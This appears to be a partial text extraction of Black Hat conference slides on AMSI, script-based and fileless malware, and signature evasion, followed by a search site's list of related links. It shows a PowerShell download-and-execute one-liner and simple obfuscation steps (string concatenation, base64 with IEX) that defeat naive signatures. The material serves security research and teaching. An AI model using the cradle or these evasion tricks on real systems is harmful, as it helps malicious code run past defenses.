The Rise and Fall of AMSI - Black Hat Briefings
The Rise and Fall of AMSI
@Tal_Liberman
About me
@Tal_Liberman Research & Reverse Engineering Founder @ Polarium Previously
Head of Research Team @ enSilo #ProcessDoppelg?nging #AtomBombing
Overview
Introduction
Script Based & Fileless Threats Obfuscation The Cat and Mouse Game
AMSI Overview
AMSI from the Developer's Perspective AMSI from the Security Vendor's Perspective
Building and Registering Your Own AMSI Provider Bypassing AMSI Final Thoughts
Script Based Threats
"Script-based malware - on the rise" This is not a trend - it's mainstream There are more script based threats than there are binary threats* Why scripts?
Already available on all target machines Vastly used in domain settings Scripts are faster to develop Minimal skills needed to achieve good functionality Obfuscation of text is more simple than of machine code Harder to monitor scripts than compiled executables
Fileless Threats
A file always has to be run
Assuming the malware survives a reboot
But it can be a MS signed executable being abused Notorious examples are Poweliks and Kovter The main idea is to use a scripting engine to run code via command line Example:
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(`')"
Obfuscation
In software development, obfuscation is the deliberate act of creating source or machine code that is difficult for humans to understand -Wikipedia.
Well... except for the word "humans".
The Cat and Mouse Game
Let's start with a simple example: function Invoke-Malware { Write-Host `Malware!'; }
Simple signature: if script contains "Write-Host `Malware'" Malicious Simple bypass:
function Invoke-Malware { Write-Host "Malware!";
}
Simple signature: if re.findall("Write-Host .Malware.", script) Malicious
Simple bypass: function Invoke-Malware { Write-Host ("Mal" + "ware!"); }
The Cat and Mouse Game
Let's start being a little more sophisticated (just a bit): function Invoke-NotMalware { $malware_base64 = "V3JpdGUtSG9zdCAiTWFsd2FyZSEi"; $malware = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($malware_base64)); IEX ($malware); }
Simple signature:
if script contains "V3JpdGUtSG9zdCAiTWFsd2FyZSEi" Malicious
Simple bypass: function Invoke-NotMalware { $malware_base64 = "VwByAGkAdABlAC0ASABvAHMAdAAgACIATQBhAGwAdwBhAHIAZQAhACIA"; $malware = [System.Text.Encoding]::UNICODE.GetString([System.Convert]::FromBase64String($malware_base64)); IEX ($malware); }
................
................
In order to avoid copyright disputes, this page is only a partial summary.
To fulfill the demand for quickly locating and searching documents.
It is intelligent file search solution for home and business.
Related download
- the rise and fall of amsi black hat briefings
- powershell for pen tester post exploitation cheat sheet
- pingone office 365 deployment ping identity
- powershell convert base64 to pdf
- a hunting story recorded future
- muddywater udurrani
- powerdecode a powershell script decoder dedicated to
- 1 2 https 200y3w
- sans powershell cheat sheet
- kusto query internals azure sentinel reference
Related searches
- decline and fall of the roman empire
- rise and fall of rome
- decline and fall of rome
- the role and functions of law
- rise and fall of the roman empire
- rise and fall of roman empire
- the efficacy and effectiveness of treatment
- rise and fall of ancient rome
- state the equation and definition of photosynthesis
- the rise and fall of hitler
- the causes and consequences of the holocaust
- the trial and death of socrates pdf